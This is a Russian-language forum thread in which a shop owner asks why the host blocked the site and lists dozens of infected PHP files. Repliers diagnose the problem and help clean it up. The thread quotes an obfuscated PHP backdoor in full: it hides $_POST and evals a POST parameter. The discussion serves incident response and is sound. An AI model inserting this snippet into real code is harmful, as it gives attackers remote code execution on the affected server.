Сегодня ждал неприятностей и прилетели с неожиданной стороны, с хостинга! Цитирую службу поддержки: Ваш сайт заблокирован за запуск запрещенных процессов: 5007 686950 0.0 0.0 837236 4708 ? Sl 10:36 0:00 ././crond Проверьте следующие файлы, они могут быть заражены: httpdocs/system/engine/themes.php httpdocs/system/library/gallery.php httpdocs/system/defines.php httpdocs/system/database/sqlite.php httpdocs/download/dir.php httpdocs/1_distribution/system/general.php httpdocs/1_distribution/system/library/sms.php httpdocs/1_distribution/install/controller/menu.php httpdocs/1_distribution/catalog/language/russian/product/manufacturer.php httpdocs/1_distribution/catalog/language/russian/product/category.php httpdocs/1_distribution/catalog/language/english/common/general.php httpdocs/1_distribution/catalog/language/english/mail/voucher.php httpdocs/1_distribution/catalog/language/english/product/product.php httpdocs/1_distribution/catalog/language/english/product/search.php httpdocs/1_distribution/catalog/language/english/account/model.php httpdocs/1_distribution/catalog/language/english/payment/free_checkout.php httpdocs/1_distribution/catalog/model/catalog/manufacturer.php httpdocs/1_distribution/catalog/model/payment/sagepay.php httpdocs/1_distribution/catalog/controller/dump.php httpdocs/stats.php httpdocs/image/data/2/files.php httpdocs/image/cache/data/krupnomer/template.php httpdocs/catalog/view/theme/fancycart/gallery.php httpdocs/catalog/view/theme/fancycart/template/checkout/dump.php httpdocs/catalog/view/javascript/jquery/ui/external/header.php httpdocs/catalog/view/javascript/jquery/ui/themes/ui-lightness/sql.php httpdocs/catalog/view/javascript/jquery/colorbox/images/view.php httpdocs/catalog/view/javascript/jquery/superfish/js/alias.php httpdocs/catalog/view/javascript/unitpngfix/xml.php httpdocs/catalog/language/russian/module/welcome.php httpdocs/catalog/language/russian/shipping/utf.php httpdocs/catalog/language/russian/mail/affiliate.php httpdocs/catalog/language/russian/total/handling.php httpdocs/catalog/language/russian/affiliate/forgotten.php httpdocs/catalog/language/english/common/maintenance.php httpdocs/catalog/language/english/shipping/item.php httpdocs/catalog/language/english/product/stats.php httpdocs/catalog/model/total/klarna_fee.php httpdocs/catalog/model/payment/user.php httpdocs/catalog/controller/checkout/xml.php httpdocs/catalog/controller/common/header.php httpdocs/catalog/controller/module/slideshow.php httpdocs/catalog/controller/affiliate/include.php httpdocs/catalog/controller/account/wishlist.php В них содержится код: <?php $lev8= "sou_tper"; $oixr1 =$lev8[0]. $lev8[4]. $lev8[7]. $lev8[4]. $lev8[1].$lev8[2]. $lev8[5]. $lev8[5].$lev8[6]. $lev8[7];$wer79= $oixr1 ( $lev8[3]. $lev8[5] . $lev8[1]. $lev8[0]. $lev8[4] ); if ( isset(${ $wer79 } ['qf385ab'] )){ eval(${$wer79} [ 'qf385ab']); } ?> Для разблокировки, устраните проблему. Кто нибудь сталкивался с аналогичной проблемой? Откуда мог прилететь вирус? Что за "запуск запрещенных процессов: 5007 686950 0.0 0.0 837236 4708 ? Sl 10:36 0:00 ././crond" ? Как с ним бороться?
Последний год ничего на этом магазине не ставил. Клиент может быть что-то ставил? В отчете анитивируса хостинга написано "На ваших сайтах вирусы и вредоносные программы не обнаружены." А тех поддержка заблокировала и требует устранить или заплатить и они сами устранят.
ну само по себе врятли появилось, разве умышлено. Скорее всего занес с чем-то. Файлы через бейс64 проганял? Возьми бекап и сверь файлы.
Судя по сообщению, проблема в <?php $lev8= "sou_tper"; $oixr1 =$lev8[0]. $lev8[4]. $lev8[7]. $lev8[4]. $lev8[1].$lev8[2]. $lev8[5]. $lev8[5].$lev8[6]. $lev8[7];$wer79= $oixr1 ( $lev8[3]. $lev8[5] . $lev8[1]. $lev8[0]. $lev8[4] ); if ( isset(${ $wer79 } ['qf385ab'] )){ eval(${$wer79} [ 'qf385ab']); } ?> А такой код php действительно есть в указанных файлах ? Уровни какие-то, может мега-меню какое-то устанавливали ? Проверить файлы на искомый код, если там ничего нет - отключить все модули vkmod, если проблема останется - спросить сколько будет стоить устранение сотрудниками хостинга ? Может там делов на копейку и не стоит того времени, которое на это будет потрачено.
Это бекдор. Весь код до if нужен, чтоб спрятать $_POST, а дальше идёт проверка есть ли в пост POST запросе параметр qf385ab и если есть, выполнение его содержимого через eval. Раз уж у вас есть список файлов с этим кодом, просто поудаляйте его из всех этих файлов. А потом думайте, как он туда мог попасть. А варианта только два: либо что-то устанавливалось и при заливке заменило все эти файлы, что маловероятно, ибо должно было повлечь появление хоть каких-то ошибок, либо этот код напихали вручную уже прямо в сам магазин. Кстати, в этом списке у вас есть странные файлы, которых по умолчанию нет в ОК, а некоторых и в принципе быть не может там, где они есть:
Очень практичная информация. Еще один практичный вопрос: хостер отключил все сервисы на этот магазин, в т.ч. и файловый менеджер. Насколько опасно по ФТП загрузить эти файлы на комп? Не заражу
Все проблемы решены! Кроме одной: не выяснили откуда залетел бэкдор... В процессе очистки уже на глазок можно было находить зараженные файлы: по дате, по размеру, по названию. Одним словом, хеппи энд!